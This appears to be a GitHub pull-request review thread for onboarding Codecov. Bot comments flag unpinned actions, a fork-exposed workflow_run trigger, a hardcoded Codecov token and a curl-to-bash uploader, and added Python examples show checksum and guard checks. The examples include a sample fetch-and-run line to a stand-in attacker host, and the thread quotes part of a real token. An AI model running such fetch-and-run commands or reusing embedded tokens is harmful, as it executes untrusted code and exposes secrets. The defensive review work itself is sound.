ci: onboard codecov #74
Conversation
Walkthrough
Adds test coverage generation and directories to Taskfile, uploads the coverage report as a CI artifact, introduces a workflow that downloads that artifact and uploads it to Codecov, and adds a
Changes
Code Coverage and Reporting
🎯 2 (Simple) | ⏱️ ~10 minutes
Sequence Diagram(s)
sequenceDiagram
participant Developer
participant GitHubActions_CI as CI
participant ArtifactStore
participant UploadWorkflow
participant Codecov
Developer->>CI: trigger `ci` (runs `task test` producing `build/_output/coverage/coverage.txt`)
CI->>ArtifactStore: upload artifact `coverage` (coverage.txt)
UploadWorkflow->>ArtifactStore: download artifact from triggering run id
UploadWorkflow->>Codecov: upload `coverage/coverage.txt` (uses secrets.CODECOV_TOKEN)
Codecov-->>UploadWorkflow: respond with upload result
Actionable comments posted: 5
🤖 Prompt for all review comments with AI agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.
Inline comments:
In @.github/workflows/ci.yml:
- Line 33: Replace the floating tag for the GitHub Action by pinning
actions/upload-artifact@v7 to a specific full commit SHA: locate the workflow
step that currently references "uses: actions/upload-artifact@v7" and change it
to use the action at a full commit SHA (e.g.,
actions/upload-artifact@<full-commit-sha>); obtain the SHA from the
upload-artifact repository commit history or the action's release page and
update the workflow to use that exact SHA to hard-pin the dependency.
In @.github/workflows/upload-coverage.yml:
- Line 15: The workflow currently references mutable tags for actions
(actions/download-artifact@v8 and codecov/codecov-action@v6); replace these
tag-based pins with the corresponding immutable commit SHAs for those actions to
ensure supply-chain integrity: find the uses of "actions/download-artifact@v8"
and "codecov/codecov-action@v6" in the upload-coverage.yml and update each to
the full commit SHA (e.g., actions/download-artifact@<full-sha> and
codecov/codecov-action@<full-sha>) obtained from the respective action
repositories' commit history, then run a quick workflow lint or dry run to
validate the YAML.
- Around line 9-10: The workflow currently only checks
github.event.workflow_run.conclusion and may run on forked workflow_run events;
update the if condition to also require the run came from the same repository
(e.g., require github.event.workflow_run.head_repository.full_name ==
github.repository) so secrets like CODECOV_TOKEN are not exposed to
fork-triggered runs, and replace the action references
actions/download-artifact@v8 and codecov/codecov-action@v6 with their SHA-pinned
commits (use the specific commit SHAs for those two actions in the
upload-coverage.yml job step definitions) so the workflow uses exact action
revisions.
In @taskfile.yaml:
- Line 6: The file contains a hardcoded secret under the key CODECOV_TOKEN;
remove the literal value and change the usage to read the token from
environment/CI secrets instead (replace the hardcoded "d85bfa60-..." in the
taskfile.yaml entry for CODECOV_TOKEN with an environment variable reference and
ensure the CI pipeline sets CODECOV_TOKEN as a secret); update any docs or CI
config to define the secret in the pipeline/secret store and verify code that
reads CODECOV_TOKEN (e.g., the taskfile.yaml entry) will fall back or fail
clearly if the env var is missing.
- Around line 38-56: The task target that uploads Codecov
(upload-codecov-report) currently prints env (the "- env" step) and uses
curl|bash plus a hardcoded {{.CODECOV_TOKEN}}, which leaks secrets and is
unsafe; remove the "- env" dump, stop using bash <(curl ...) and instead source
CODECOV_TOKEN from environment/Task/CI secrets (do not inline the token), and
replace the curl-to-bash invocation with a safe, pinned uploader strategy
consistent with GitHub CI (e.g., call the official codecov uploader binary from
a verified package or invoke codecov/codecov-action@v6 equivalent in Task by
running the pinned action or the downloaded, checksummed CLI), updating the
upload block in upload-codecov-report to use {{.COV_DIR}}/coverage.txt and the
appropriate commit variable ({{.PR_COMMIT}} or {{.BASE_COMMIT}}) without echoing
env or exposing secrets.
ℹ️ Review info
⚙️ Run configuration
Configuration used: Organization UI
Review profile: CHILL
Plan: Enterprise
Run ID: ddbe1f9e-a3e9-46a4-a7f9-786dce65253e
📒 Files selected for processing (5)
- .codecov.yaml
- .github/workflows/ci.yml
- .github/workflows/upload-coverage.yml
- .gitignore
- taskfile.yaml
📜 Review details
⏰ Context from checks skipped due to timeout of 90000ms. You can increase the timeout in your CodeRabbit configuration to a maximum of 15 minutes (900000ms). (4)
- GitHub Check: Lint
- GitHub Check: Build Image
- GitHub Check: Test
- GitHub Check: govulncheck
🧰 Additional context used
📓 Path-based instructions (1)
**
⚙️ CodeRabbit configuration file
- Focus on major issues impacting performance, readability, maintainability and security. Avoid nitpicks and avoid verbosity.
Files:
taskfile.yaml
🪛 Betterleaks (1.3.1)
taskfile.yaml
[high] 6-6: Detected a Generic API Key, potentially exposing access to various services and sensitive operations.
(generic-api-key)
🪛 zizmor (1.25.2)
.github/workflows/upload-coverage.yml
[error] 2-5: use of fundamentally insecure workflow trigger (dangerous-triggers): workflow_run is almost always used insecurely
(dangerous-triggers)
[error] 15-15: unpinned action reference (unpinned-uses): action is not pinned to a hash (required by blanket policy)
(unpinned-uses)
[error] 22-22: unpinned action reference (unpinned-uses): action is not pinned to a hash (required by blanket policy)
(unpinned-uses)
.github/workflows/ci.yml
[error] 33-33: unpinned action reference (unpinned-uses): action is not pinned to a hash (required by blanket policy)
(unpinned-uses)
🔀 Multi-repo context codeready-toolchain/api, codeready-toolchain/toolchain-common, codeready-toolchain/host-operator, codeready-toolchain/toolchain-e2e
codeready-toolchain/api
- Codecov config present: .codecov.yaml [::codeready-toolchain/api::.codecov.yaml]
- Make targets and coverage paths:
- OUT_DIR ./build/_output defined in make/out.mk [::codeready-toolchain/api::make/out.mk:4]
- COV_DIR = $(OUT_DIR)/coverage and go test writes $(COV_DIR)/coverage.txt in make/test.mk [::codeready-toolchain/api::make/test.mk:21,27-29]
- upload-codecov-report target calls bash <(curl -s https://codecov.io/bash) -f $(COV_DIR)/coverage.txt [::codeready-toolchain/api::make/test.mk:31-45]
- .gitignore ignores build/_output and coverage.txt [::codeready-toolchain/api::.gitignore:17,?]
- A YAML lint include references /.codecov.yaml [::codeready-toolchain/api::.yamllint:3]
codeready-toolchain/toolchain-common
- Coverage integration already present:
- OUT_DIR ./out and COV_DIR = $(OUT_DIR)/coverage defined in make/out.mk / make/test.mk [::codeready-toolchain/toolchain-common::make/out.mk:4,::codeready-toolchain/toolchain-common::make/test.mk:13,19]
- test-ci/test-with-coverage flow and upload-codecov-report that posts $(COV_DIR)/coverage.txt [::codeready-toolchain/toolchain-common::make/test.mk:8-13,21-36]
- GH Actions upload workflow exists: .github/workflows/upload-coverage.yml uses codecov/codecov-action@v6 and files: coverage/coverage.txt [::codeready-toolchain/toolchain-common::.github/workflows/upload-coverage.yml:1,22,27]
- sonar config expects out/coverage/coverage.txt [::codeready-toolchain/toolchain-common::sonar-project.properties:19]
- README badge referencing Codecov [::codeready-toolchain/toolchain-common::README.adoc:5]
- codecov.yaml present (repo-specific config) [::codeready-toolchain/toolchain-common::codecov.yaml:1]
codeready-toolchain/host-operator
- Coverage integration and upload target:
- OUT_DIR ./build/_output and COV_DIR = $(OUT_DIR)/coverage; go test writes $(COV_DIR)/coverage.txt [::codeready-toolchain/host-operator::make/out.mk:4,::codeready-toolchain/host-operator::make/test.mk:21,27-29]
- upload-codecov-report target uses codecov bash uploader -f $(COV_DIR)/coverage.txt [::codeready-toolchain/host-operator::make/test.mk:31-45]
- GH Actions upload workflow exists: .github/workflows/upload-coverage.yml uses codecov action and files: coverage/coverage.txt [::codeready-toolchain/host-operator::.github/workflows/upload-coverage.yml:1,22,27]
- .codecov.yaml present [::codeready-toolchain/host-operator::.codecov.yaml:1]
- .gitignore contains build/_output and coverage.txt [::codeready-toolchain/host-operator::.gitignore:2,6]
- README badge referencing Codecov [::codeready-toolchain/host-operator::README.adoc:5]
codeready-toolchain/toolchain-e2e
- Repository uses build/_output OUT_DIR layout and ignores build/_output and coverage.txt in .gitignore [::codeready-toolchain/toolchain-e2e::make/out.mk:4,::codeready-toolchain/toolchain-e2e::.gitignore:2,7]
- No explicit make/test.mk coverage upload targets or .codecov.yaml discovered in search results for this repo (only out.mk and various make files referencing OUT_DIR) [::codeready-toolchain/toolchain-e2e::make/out.mk:1]
Summary / impact
- The PR adds CI steps and workflow files in argocd-mcp-server to upload coverage; the codeready-toolchain repos already have similar coverage conventions (OUT_DIR/COV_DIR -> coverage/coverage.txt), make targets (upload-codecov-report), and existing repo-level Codecov configs and upload workflows. Paths and artifact names (coverage/coverage.txt or build/_output/out/coverage/coverage.txt) are consistent and used across repos, so Codecov onboarding here follows established patterns and is unlikely to introduce API/contract breakage between repos.
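The two taskfile.yaml findings in the review above (a hardcoded CODECOV_TOKEN plus an env dump, and bash <(curl ...) as the uploader) amount to two concrete checks: take the token from the CI secret store and fail clearly when it is missing, and execute nothing fetched from the network until its digest matches a published checksum. The block below is an added example of both checks; it is not code from this PR, from the codeready-toolchain repositories, or from CodeRabbit. The uploader bytes and the sha256sum-format checksum file are constructed stand-ins, and the example assumes the uploader you actually download ships such a checksum file (signature verification of that file is out of scope here).

```python
import hashlib
import hmac
import os
from typing import Dict, Optional

# Constructed stand-ins (not a real uploader and not a real checksum file): the
# bytes of a downloaded uploader binary and the sha256sum-format file that would
# be published alongside it.
UPLOADER_NAME = "codecov"
UPLOADER_BYTES = b"#!/bin/sh\necho 'constructed stand-in for an uploader binary'\n"
TAMPERED_BYTES = UPLOADER_BYTES + b"curl -s https://attacker.invalid/x | sh\n"
PUBLISHED_SUMS = (
    "# sha256sum format: <64 hex digits>  <file name>\n"
    f"{hashlib.sha256(UPLOADER_BYTES).hexdigest()}  {UPLOADER_NAME}\n"
)


def parse_sha256sums(text: str) -> Dict[str, str]:
    """Parse sha256sum(1) output into {file name: hex digest}.

    A leading '*' on the file name (binary mode) is stripped. Malformed lines are
    rejected instead of skipped, so a truncated checksum file cannot pass silently.
    """
    sums: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        if (len(parts) != 2 or len(parts[0]) != 64
                or not all(c in "0123456789abcdefABCDEF" for c in parts[0])):
            raise ValueError(f"malformed checksum line: {line!r}")
        digest, name = parts
        sums[name.lstrip("*")] = digest.lower()
    return sums


def verify_sha256(data: bytes, expected_hex: str) -> bool:
    """Constant-time comparison of the actual digest against the published one."""
    actual = hashlib.sha256(data).hexdigest()
    return hmac.compare_digest(actual, expected_hex.lower())


def verified_uploader(name: str, data: bytes, sums_text: str) -> bytes:
    """Return the bytes only if they match the published digest; otherwise refuse.

    This is the step that `bash <(curl ...)` skips: nothing from the network is
    handed to a shell until its digest matches what was published out of band.
    """
    sums = parse_sha256sums(sums_text)
    if name not in sums:
        raise ValueError(f"no checksum published for {name!r}")
    if not verify_sha256(data, sums[name]):
        raise ValueError(f"checksum mismatch for {name!r}; refusing to execute it")
    return data


def codecov_token_from_env(env: Optional[Dict[str, str]] = None) -> str:
    """Read CODECOV_TOKEN from the environment (CI secret store); fail loudly if absent.

    The token is never echoed or written to disk; pass it to the uploader through
    its environment rather than on a command line that ends up in logs.
    """
    source = os.environ if env is None else env
    token = source.get("CODECOV_TOKEN", "").strip()
    if not token:
        raise RuntimeError(
            "CODECOV_TOKEN is not set: define it as a CI secret and export it "
            "into the job environment instead of hardcoding it in taskfile.yaml"
        )
    return token


if __name__ == "__main__":
    verified_uploader(UPLOADER_NAME, UPLOADER_BYTES, PUBLISHED_SUMS)
    print("published digest matches; uploader may run")
    try:
        verified_uploader(UPLOADER_NAME, TAMPERED_BYTES, PUBLISHED_SUMS)
    except ValueError as exc:
        print("rejected:", exc)
```

In a Task target the equivalent is: download the binary and its checksum file to `{{.COV_DIR}}`, run the verification, and only then invoke the uploader with `CODECOV_TOKEN` inherited from the job environment, never interpolated into the command text.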
task test

- name: Upload coverage artifact
  uses: actions/upload-artifact@v7
🧩 Analysis chain
🏁 Script executed:
#!/bin/bash
set -euo pipefail
# Show the relevant section around the referenced line
nl -ba .github/workflows/ci.yml | sed -n '20,60p'
# Find all usages of upload-artifact in the repo
rg -n "uses:\s*actions/upload-artifact@" .github/workflows || true
# Also find any pinned-to-SHA patterns for upload-artifact (heuristic: 40+ hex chars)
rg -n "uses:\s*actions/upload-artifact@[0-9a-f]{7,40}" .github/workflows || true
# Print any other upload-artifact usage with other tags
rg -n "uses:\s*actions/upload-artifact@" .github/workflows || true
Repository: codeready-toolchain/argocd-mcp-server
Length of output: 124
🏁 Script executed:
#!/bin/bash
set -euo pipefail
echo "=== ci.yml excerpt (lines 20-60) ==="
python3 - <<'PY'
path = ".github/workflows/ci.yml"
with open(path, "r", encoding="utf-8") as f:
lines = f.readlines()
for i in range(19, min(60, len(lines))):
print(f"{i+1:4d}: {lines[i].rstrip()}")
PY
echo
echo "=== All upload-artifact usages ==="
rg -n "uses:\s*actions/upload-artifact@" .github/workflows || true
echo
echo "=== upload-artifact usages pinned to long hex (heuristic) ==="
rg -n "uses:\s*actions/upload-artifact@[0-9a-f]{7,40}" .github/workflows || true
Repository: codeready-toolchain/argocd-mcp-server
Length of output: 1453
Pin actions/upload-artifact to a full commit SHA.
The workflow uses actions/upload-artifact@v7, and the movable tag weakens supply-chain guarantees.
Suggested fix pattern
- uses: actions/upload-artifact@v7
+ uses: actions/upload-artifact@<full-length-commit-sha>
🧰 Tools
🪛 zizmor (1.25.2)
[error] 33-33: unpinned action reference (unpinned-uses): action is not pinned to a hash (required by blanket policy)
(unpinned-uses)
🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.
In @.github/workflows/ci.yml at line 33, Replace the floating tag for the GitHub
Action by pinning actions/upload-artifact@v7 to a specific full commit SHA:
locate the workflow step that currently references "uses:
actions/upload-artifact@v7" and change it to use the action at a full commit SHA
(e.g., actions/upload-artifact@<full-commit-sha>); obtain the SHA from the
upload-artifact repository commit history or the action's release page and
update the workflow to use that exact SHA to hard-pin the dependency.
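The pinning comment above boils down to one rule: a `uses:` reference is only immutable when the part after `@` is a full 40-character commit SHA; tags such as `@v7` can be moved. The block below is an added example of that check and of the rewrite, not code from this PR or from zizmor; it classifies every `uses:` line of a constructed sample workflow (not the PR's ci.yml) and rewrites a tag reference to a SHA while keeping the tag as a trailing comment. The sample action names and the SHA values are illustrative.

```python
import re
from typing import List, Tuple

# Constructed sample workflow (not the PR's ci.yml): a mix of pinned, unpinned,
# local and container references, so every branch of the classifier is exercised.
SAMPLE_WORKFLOW = """\
name: ci
on: [push]
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@8e5e7e5ab8b370d6c329ec480221332ada57f0ab # v3.5.2
      - run: task test
      - name: Upload coverage artifact
        uses: actions/upload-artifact@v7
      - uses: ./.github/actions/local-step
      - uses: docker://ghcr.io/example/image:1.2.3
      - uses: codecov/codecov-action@v6
"""

USES_RE = re.compile(r"^\s*-?\s*uses:\s*['\"]?([^'\"\s#]+)")
FULL_SHA_RE = re.compile(r"^[0-9a-f]{40}$")


def classify_uses(ref: str) -> str:
    """Classify a `uses:` reference as pinned, unpinned, local or docker.

    Only a full 40-hex commit SHA counts as pinned: tags and branches (v7, main)
    can be moved by the action's maintainers or by whoever compromises them, and
    a short SHA prefix is not an exact revision.
    """
    if ref.startswith("./"):
        return "local"      # same-repo action, versioned with this checkout
    if ref.startswith("docker://"):
        return "docker"     # image refs are pinned by digest, a separate check
    if "@" not in ref:
        return "unpinned"
    _, version = ref.rsplit("@", 1)
    return "pinned" if FULL_SHA_RE.match(version) else "unpinned"


def find_unpinned_uses(workflow_text: str) -> List[Tuple[int, str]]:
    """Return (line number, reference) for every action not pinned to a full SHA."""
    findings: List[Tuple[int, str]] = []
    for lineno, line in enumerate(workflow_text.splitlines(), start=1):
        match = USES_RE.match(line)
        if match and classify_uses(match.group(1)) == "unpinned":
            findings.append((lineno, match.group(1)))
    return findings


def pin_uses_line(line: str, sha: str) -> str:
    """Rewrite `uses: owner/action@tag` to `uses: owner/action@<sha> # tag`.

    The original tag is kept as a trailing comment so update tooling and human
    reviewers can still see which release the SHA was taken from.
    """
    if not FULL_SHA_RE.match(sha):
        raise ValueError("expected a full 40-character lowercase hex commit SHA")
    match = re.match(r"^(\s*-?\s*uses:\s*)([^@\s]+)@(\S+)(.*)$", line)
    if not match:
        raise ValueError(f"not a `uses:` line with an @ref: {line!r}")
    prefix, action, old_ref, rest = match.groups()
    return f"{prefix}{action}@{sha} # {old_ref}{rest}"


if __name__ == "__main__":
    for lineno, ref in find_unpinned_uses(SAMPLE_WORKFLOW):
        print(f"line {lineno}: unpinned action {ref}")
```

Run it against a real `.github/workflows/*.yml` by reading the file into `find_unpinned_uses`; the SHA passed to `pin_uses_line` must come from the action repository's tag or release page for the version you intend, which this example deliberately does not fetch.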
if: >
  github.event.workflow_run.conclusion == 'success'
🧩 Analysis chain
🏁 Script executed:
#!/bin/bash
set -euo pipefail
FILE=".github/workflows/upload-coverage.yml"
echo "== File =="
ls -l "$FILE"
echo
echo "== Lines 1-120 =="
nl -ba "$FILE" | sed -n '1,140p'
Repository: codeready-toolchain/argocd-mcp-server
Length of output: 258
🏁 Script executed:
#!/bin/bash
set -euo pipefail
rg -n "CODECOV_TOKEN|workflow_run|codecov-action|download-artifact" .github/workflows -S
echo
echo "== List workflow files =="
ls -1 .github/workflows
Repository: codeready-toolchain/argocd-mcp-server
Length of output: 700
Add a trusted-repo guard (and SHA-pin actions) in workflow_run coverage uploader.
codeready-toolchain/argocd-mcp-server/.github/workflows/upload-coverage.yml runs on workflow_run, gates only on github.event.workflow_run.conclusion == 'success', then uploads using secrets.CODECOV_TOKEN. Add a trust guard (e.g., require github.event.workflow_run.head_repository.full_name == github.repository) so fork-originated runs can’t trigger secret-bearing uploads. Also SHA-pin actions/download-artifact@v8 and codecov/codecov-action@v6 rather than using only major-version tags.
Suggested guard
- if: >
- github.event.workflow_run.conclusion == 'success'
+ if: >
+ github.event.workflow_run.conclusion == 'success' &&
+ github.event.workflow_run.head_repository.full_name == github.repository
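Review bot: the added condition narrows which runs can reach the CODECOV_TOKEN step, but it does not change the trigger, so the zizmor dangerous-triggers finding on lines 2-5 of upload-coverage.yml will still be reported after this suggestion is applied; say so in the PR rather than expecting the linter to clear. The suggestion also leaves the unpinned uses on lines 15 and 22 untouched, which the same comment asks for, so those need a separate edit.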
🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.
In @.github/workflows/upload-coverage.yml around lines 9 - 10, The workflow
currently only checks github.event.workflow_run.conclusion and may run on forked
workflow_run events; update the if condition to also require the run came from
the same repository (e.g., require
github.event.workflow_run.head_repository.full_name == github.repository) so
secrets like CODECOV_TOKEN are not exposed to fork-triggered runs, and replace
the action references actions/download-artifact@v8 and codecov/codecov-action@v6
with their SHA-pinned commits (use the specific commit SHAs for those two
actions in the upload-coverage.yml job step definitions) so the workflow uses
exact action revisions.
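The guard suggested above is a GitHub expression, which makes it awkward to test before pushing. The block below is an added example, not code from this PR or from CodeRabbit, that evaluates the same two conditions over constructed workflow_run event payloads (trimmed to the fields the guard reads; the repository names are illustrative). It fails closed on a missing or malformed head_repository, which is the behaviour you want from a condition that gates a secret.

```python
from typing import Any, Dict, Tuple

# Constructed workflow_run event payloads, reduced to the fields the guard reads.
REPO = "codeready-toolchain/argocd-mcp-server"
FORK = "someone-else/argocd-mcp-server"

SAME_REPO_SUCCESS = {"workflow_run": {"conclusion": "success",
                                      "head_repository": {"full_name": REPO}}}
FORK_SUCCESS = {"workflow_run": {"conclusion": "success",
                                 "head_repository": {"full_name": FORK}}}
SAME_REPO_FAILURE = {"workflow_run": {"conclusion": "failure",
                                      "head_repository": {"full_name": REPO}}}
MISSING_HEAD_REPO = {"workflow_run": {"conclusion": "success",
                                      "head_repository": None}}


def should_upload_coverage(event: Dict[str, Any], repository: str) -> Tuple[bool, str]:
    """Evaluate the proposed `if:` guard outside of Actions.

    Mirrors `conclusion == 'success' && head_repository.full_name == github.repository`.
    Every path that cannot positively establish a successful, same-repository run
    returns False, so a missing or malformed field fails closed.
    """
    run = event.get("workflow_run")
    if not isinstance(run, dict):
        return False, "no workflow_run payload"
    conclusion = run.get("conclusion")
    if conclusion != "success":
        return False, f"conclusion is {conclusion!r}, not 'success'"
    head_repo = run.get("head_repository")
    head_name = head_repo.get("full_name") if isinstance(head_repo, dict) else None
    if head_name != repository:
        return False, f"head repository {head_name!r} is not {repository!r}"
    return True, "successful run from the same repository"


if __name__ == "__main__":
    cases = [("same-repo success", SAME_REPO_SUCCESS), ("fork success", FORK_SUCCESS),
             ("same-repo failure", SAME_REPO_FAILURE), ("missing head_repository", MISSING_HEAD_REPO)]
    for label, event in cases:
        allowed, reason = should_upload_coverage(event, REPO)
        print(f"{label}: {'upload' if allowed else 'skip'} ({reason})")
```

The field to compare is head_repository: a workflow_run event's repository field names the base repository the workflow runs in, so comparing that to github.repository would pass for fork-originated runs as well.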
steps:
  - name: Download coverage artifact
    uses: actions/download-artifact@v8
🧩 Analysis chain
🏁 Script executed:
#!/bin/bash
set -euo pipefail
FILE=".github/workflows/upload-coverage.yml"
echo "== File: $FILE =="
nl -ba "$FILE" | sed -n '1,120p'
echo
echo "== All action uses in $FILE =="
rg -n "^\s*uses:" "$FILE" || true
Repository: codeready-toolchain/argocd-mcp-server
Length of output: 192
🏁 Script executed:
#!/bin/bash
set -euo pipefail
FILE=".github/workflows/upload-coverage.yml"
echo "== File: $FILE =="
awk '{printf "%5d\t%s\n", NR, $0}' "$FILE" | sed -n '1,140p'
echo
echo "== All action uses in $FILE =="
rg -n "^\s*uses:" "$FILE" || true
Repository: codeready-toolchain/argocd-mcp-server
Length of output: 1420
🏁 Script executed:
#!/bin/bash
set -euo pipefail
FILE=".github/workflows/upload-coverage.yml"
echo "== $FILE =="
awk '{printf "%5d\t%s\n", NR, $0}' "$FILE" | sed -n '1,140p'
echo
rg -n "^\s*uses:" "$FILE" || true
Repository: codeready-toolchain/toolchain-common
Length of output: 1362
🏁 Script executed:
#!/bin/bash
set -euo pipefail
FILE=".github/workflows/upload-coverage.yml"
echo "== $FILE =="
awk '{printf "%5d\t%s\n", NR, $0}' "$FILE" | sed -n '1,160p'
echo
rg -n "^\s*uses:" "$FILE" || true
Repository: codeready-toolchain/host-operator
Length of output: 1363
Pin GitHub Actions to commit SHAs (supply-chain integrity)
In .github/workflows/upload-coverage.yml, both action references are tag-based (actions/download-artifact@v8 at 15, codecov/codecov-action@v6 at 22) and should be replaced with immutable full commit SHAs.
Suggested fix pattern
- uses: actions/download-artifact@v8
+ uses: actions/download-artifact@<full-length-commit-sha>
...
- uses: codecov/codecov-action@v6
+ uses: codecov/codecov-action@<full-length-commit-sha>
🧰 Tools
🪛 zizmor (1.25.2)
[error] 15-15: unpinned action reference (unpinned-uses): action is not pinned to a hash (required by blanket policy)
(unpinned-uses)
🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.
In @.github/workflows/upload-coverage.yml at line 15, The workflow currently
references mutable tags for actions (actions/download-artifact@v8 and
codecov/codecov-action@v6); replace these tag-based pins with the corresponding
immutable commit SHAs for those actions to ensure supply-chain integrity: find
the uses of "actions/download-artifact@v8" and "codecov/codecov-action@v6" in
the upload-coverage.yml and update each to the full commit SHA (e.g.,
actions/download-artifact@<full-sha> and codecov/codecov-action@<full-sha>)
obtained from the respective action repositories' commit history, then run a
quick workflow lint or dry run to validate the YAML.
♻️ Duplicate comments (3)
.github/workflows/ci.yml (1)
33-33: ⚠️ Potential issue | 🟠 Major | ⚡ Quick win
Pin actions/upload-artifact to an immutable commit SHA.
Line 33 uses a floating major tag (@v7), which weakens supply-chain guarantees for CI.
Suggested fix
- uses: actions/upload-artifact@v7
+ uses: actions/upload-artifact@<full-length-commit-sha>
🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the rest with a brief reason, keep changes minimal, and validate.
In @.github/workflows/ci.yml at line 33, Replace the floating major tag for the upload artifact action with an immutable commit SHA to harden CI supply-chain; locate the workflow step that uses "actions/upload-artifact@v7" and change it to the corresponding pinned commit reference (e.g., "actions/upload-artifact@<commit-sha>") and include a short comment with the upstream release or date if helpful, then run the workflow locally or in a test branch to verify the action still behaves as expected.
.github/workflows/upload-coverage.yml (2)
15-15: ⚠️ Potential issue | 🟠 Major | ⚡ Quick win
Pin both action references to full commit SHAs.
Lines 15 and 22 use mutable tags; replace both with immutable SHAs.
Suggested fix
- uses: actions/download-artifact@v8
+ uses: actions/download-artifact@<full-length-commit-sha>
...
- uses: codecov/codecov-action@v6
+ uses: codecov/codecov-action@<full-length-commit-sha>
Also applies to: 22-22
🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the rest with a brief reason, keep changes minimal, and validate.
In @.github/workflows/upload-coverage.yml at line 15, Replace the mutable action tags with immutable commit SHAs: locate the uses of actions/download-artifact (currently "actions/download-artifact@v8") and actions/upload-artifact (the other mutable tag around line 22) in the workflow and replace their tag suffixes with the corresponding full commit SHA for each action's repository (e.g., "actions/download-artifact@<full-commit-sha>" and "actions/upload-artifact@<full-commit-sha>") so the workflow pins to immutable references; ensure you fetch the correct commit SHAs from the official action repos and update both occurrences.
9-10: ⚠️ Potential issue | 🟠 Major | ⚡ Quick win
Add a trusted-repo guard before using CODECOV_TOKEN.
Line 10 checks only for successful completion; add a same-repository condition so this secret-bearing job does not run for untrusted workflow_run sources.
Suggested fix
- if: >
-   github.event.workflow_run.conclusion == 'success'
+ if: >
+   github.event.workflow_run.conclusion == 'success' &&
+   github.event.workflow_run.head_repository.full_name == github.repository
🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the rest with a brief reason, keep changes minimal, and validate.
In @.github/workflows/upload-coverage.yml around lines 9 - 10, The job currently only checks github.event.workflow_run.conclusion == 'success' before using the secret CODECOV_TOKEN; update the job's if condition to also require the workflow_run originate from the same repository (e.g., add a check against github.event.workflow_run.repository.full_name == github.repository or github.event.workflow_run.head_repository.full_name == github.repository) so the secret is only used for trusted, same-repo workflow runs; modify the existing if expression to combine the success check and this same-repo guard.
🤖 Prompt for all review comments with AI agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.
Duplicate comments:
In @.github/workflows/ci.yml:
- Line 33: Replace the floating major tag for the upload artifact action with an
immutable commit SHA to harden CI supply-chain; locate the workflow step that
uses "actions/upload-artifact@v7" and change it to the corresponding pinned
commit reference (e.g., "actions/upload-artifact@<commit-sha>") and include a
short comment with the upstream release or date if helpful, then run the
workflow locally or in a test branch to verify the action still behaves as
expected.
In @.github/workflows/upload-coverage.yml:
- Line 15: Replace the mutable action tags with immutable commit SHAs: locate
the uses of actions/download-artifact (currently "actions/download-artifact@v8")
and actions/upload-artifact (the other mutable tag around line 22) in the
workflow and replace their tag suffixes with the corresponding full commit SHA
for each action's repository (e.g.,
"actions/download-artifact@<full-commit-sha>" and
"actions/upload-artifact@<full-commit-sha>") so the workflow pins to immutable
references; ensure you fetch the correct commit SHAs from the official action
repos and update both occurrences.
- Around line 9-10: The job currently only checks
github.event.workflow_run.conclusion == 'success' before using the secret
CODECOV_TOKEN; update the job's if condition to also require the workflow_run
originate from the same repository (e.g., add a check against
github.event.workflow_run.repository.full_name == github.repository or
github.event.workflow_run.head_repository.full_name == github.repository) so the
secret is only used for trusted, same-repo workflow runs; modify the existing if
expression to combine the success check and this same-repo guard.
ℹ️ Review info
⚙️ Run configuration
Configuration used: Organization UI
Review profile: CHILL
Plan: Enterprise
Run ID: c91ec208-e156-4075-ad51-5dbbc91dcccb
📒 Files selected for processing (5)
- .codecov.yaml
- .github/workflows/ci.yml
- .github/workflows/upload-coverage.yml
- .gitignore
- taskfile.yaml
✅ Files skipped from review due to trivial changes (2)
- .gitignore
- .codecov.yaml
🚧 Files skipped from review as they are similar to previous changes (1)
- taskfile.yaml
📜 Review details
🧰 Additional context used
🪛 zizmor (1.25.2)
.github/workflows/ci.yml
[error] 33-33: unpinned action reference (unpinned-uses): action is not pinned to a hash (required by blanket policy)
(unpinned-uses)
.github/workflows/upload-coverage.yml
[error] 2-5: use of fundamentally insecure workflow trigger (dangerous-triggers): workflow_run is almost always used insecurely
(dangerous-triggers)
[error] 15-15: unpinned action reference (unpinned-uses): action is not pinned to a hash (required by blanket policy)
(unpinned-uses)
[error] 22-22: unpinned action reference (unpinned-uses): action is not pinned to a hash (required by blanket policy)
(unpinned-uses)
🔀 Multi-repo context codeready-toolchain/api, codeready-toolchain/toolchain-common, codeready-toolchain/host-operator, codeready-toolchain/toolchain-e2e
Linked repositories findings
codeready-toolchain/api
- Has an upload-codecov make target and uses the Codecov bash uploader: make/test.mk (lines with .PHONY: upload-codecov-report and bash <(curl -s https://codecov.io/bash)) [::codeready-toolchain/api::make/test.mk]
- A CODECOV_TOKEN literal appears in make/test.mk (token value present in search output) [::codeready-toolchain/api::make/test.mk]
codeready-toolchain/toolchain-common
- Sonar expects coverage at out/coverage/coverage.txt: sonar-project.properties:19 [::codeready-toolchain/toolchain-common::sonar-project.properties]
- Has test CI flow and upload-codecov-report target in make/test.mk (.PHONY: upload-codecov-report; test-ci: test-with-coverage upload-codecov-report) [::codeready-toolchain/toolchain-common::make/test.mk]
- Has a codecov.yaml and README badge referencing Codecov [::codeready-toolchain/toolchain-common::codecov.yaml][::codeready-toolchain/toolchain-common::README.adoc]
- A CODECOV_TOKEN literal appears in make/test.mk (token value present in search output) [::codeready-toolchain/toolchain-common::make/test.mk]
codeready-toolchain/host-operator
- Has upload-codecov-report target using the Codecov bash uploader in make/test.mk (.PHONY: upload-codecov-report and bash <(curl -s https://codecov.io/bash)) [::codeready-toolchain/host-operator::make/test.mk]
- README includes Codecov badge [::codeready-toolchain/host-operator::README.adoc]
- A CODECOV_TOKEN literal appears in make/test.mk (token value present in search output) [::codeready-toolchain/host-operator::make/test.mk]
codeready-toolchain/toolchain-e2e
- No matches for coverage/codecov found in the search output (no make/test.mk or codecov config detected) — may lack repo-level Codecov CI plumbing [::codeready-toolchain/toolchain-e2e::]
